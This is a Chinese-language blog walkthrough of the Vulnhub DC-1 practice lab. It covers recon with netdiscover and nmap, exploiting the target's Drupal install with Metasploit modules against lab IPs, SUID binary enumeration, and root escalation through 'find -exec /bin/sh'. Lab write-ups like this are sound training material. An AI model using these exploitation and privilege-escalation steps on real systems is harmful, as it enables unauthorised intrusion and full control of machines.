Vulnhub DC1

靶机简介

DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。它是为初学者设计的一个挑战,但它到底有多容易将取决于你的技能和知识,以及你的学习能力。总共有五个flag,但最终目标是在root的主目录中找到并读取该标志。您甚至不需要是root用户才能执行此操作,但是,您将需要root权限。根据你的技能水平,你可以跳过找到这些标志的大部分,直接去找根。

前言

以前打过的靶机,现在再回去重新回味一遍,不看wp磨一磨性子。五个flag,每个flag都会提供线索,但是我的最终目的是拿到root权限,所以不一定找到五个flag,如果可以的话直接拿root。如果不行的话就跟着flag走吧。

getshell

netdiscover 发现主机ip

nmap扫一扫

访问其80端口,发现了 Powered by Drupal

百度一下Drupal漏洞(太多了)

先用msf打一打

msfconsole
search Drupal

利用最新的 2019-02-20试一下

use 6
set rhost 192.168.146.128
set lhost 192.168.146.129
run

失败了 ,msf残忍的告诉我

Exploit completed, but no session was created.

再尝试一下 2018-03-28那个洞,成功拿到shell

SUID提权

用python模拟一终端

python -c 'import pty;pty.spawn("/bin/sh")'

找到正在系统上运行的所有SUID可执行文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

使用第一条就行了

发现find命令,利用find提权

find提权

简介

find命令是在指定目录下查找文件,并返回查找到的子目录和全部文件
  -exec<执行指令>:假设find指令的回传值为True,就执行该指令 #如果find有suid权限,那就可以通过find执行任意root命令

利用

直接在/tmp目录下创建个文件,然后用find找,自然会返回true。再利用-exec参数执行命令即可

cd /tmp
touch test
find test -exec "/bin/sh" ;

原文地址:https://www.cnblogs.com/tlbjiayou/p/13829484.html